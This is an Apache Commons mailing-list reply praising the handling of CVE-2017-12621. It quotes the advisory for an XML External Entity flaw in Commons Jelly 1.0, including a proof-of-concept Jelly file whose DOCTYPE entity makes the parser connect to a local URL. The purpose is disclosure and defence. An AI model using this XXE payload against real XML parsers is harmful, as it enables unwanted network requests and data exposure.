commons-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Gary Gregory <garydgreg...@gmail.com>
Subject Re: [SECURITY] CVE-2017-12621 Apache Commons Jelly connects to URL with custom doctype definitions.
Date Wed, 27 Sep 2017 15:34:46 GMT
On Wed, Sep 27, 2017 at 8:29 AM, Benedikt Ritter <britter@apache.org> wrote:

> I would like to give kudos to Rob for handling this issue. The kind of
> dedication you put into fixing this issue and releasing a component that
> has not been touched for ages is what I’m looking for in PMC members.
>
> Great work!
>

+1

Gary


> Benedikt
>
> > Am 27.09.2017 um 15:05 schrieb Rob Tompkins <chtompki@apache.org>:
> >
> > CVE-2017-12621: Apache Commons Jelly connects to URL with custom doctype
> definitions.
> >
> > Severity: Medium
> >
> > Vendor:
> > The Apache Software Foundation
> >
> > Versions Affected:
> > commons-jelly-1.0 (core), namely commons-jelly-1.0.jar
> >
> > Description:
> > During Jelly (xml) file parsing with Apache Xerces, if a custom doctype
> entity is declared with a “SYSTEM” entity with a URL and that entity is
> used in the body of the Jelly file, during parser instantiation the parser
> will attempt to connect to said URL. This could lead to XML External Entity
> (XXE) attacks. The Open Web Application Security Project suggests that the
> fix be https://www.owasp.org/index.php/XML_External_Entity_(XXE)_
> Prevention_Cheat_Sheet#XMLReader
> >
> > Mitigation:
> > 1.0 users should migrate to 1.0.1.
> >
> > Example:
> >
> > example.jelly
> > --------------
> > <?xml version="1.0"?>
> > <!---
> > Licensed to the Apache Software Foundation (ASF) under one or more
> > contributor license agreements.  See the NOTICE file distributed with
> > this work for additional information regarding copyright ownership.
> > The ASF licenses this file to You under the Apache License, Version 2.0
> > (the "License"); you may not use this file except in compliance with
> > the License.  You may obtain a copy of the License at
> >      http://www.apache.org/licenses/LICENSE-2.0
> > Unless required by applicable law or agreed to in writing, software
> > distributed under the License is distributed on an "AS IS" BASIS,
> > WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
> > See the License for the specific language governing permissions and
> > limitations under the License.
> > -->
> > <!DOCTYPE r [
> >        <!ELEMENT r ANY >
> >        <!ENTITY sp SYSTEM "http://127.0.0.1:4444/">
> >        ]>
> > <r>&sp;</r>
> > <j:jelly trim="false" xmlns:j="jelly:core"
> >         xmlns:x="jelly:xml"
> >         xmlns:html="jelly:html">
> > </j:jelly>
> > --------------
> >
> > ExampleParser.java
> > ------------------
> > public class ExampleParser {
> >
> >       public static void main(String[] args) throws JellyException,
> IOException,
> >                                       NoSuchMethodException,
> IllegalAccessException,IllegalArgumentException,
> >                                       InvocationTargetException {
> >               JellyContext context = new JellyContext();
> >               context.runScript("example.jelly", null);
> >       }
> > }
> >
> > Credit:
> > This was discovered by Luca Carettoni of Doyensec.
> >
> > References:
> > [1] http://commons.apache.org/jelly/security-reports.html
> > [2] https://issues.apache.org/jira/browse/JELLY-293
> >
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
> > For additional commands, e-mail: dev-help@commons.apache.org
> >
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@commons.apache.org
> For additional commands, e-mail: dev-help@commons.apache.org
>
>

Mime
  • Unnamed multipart/alternative (inline, None, 0 bytes)
View raw message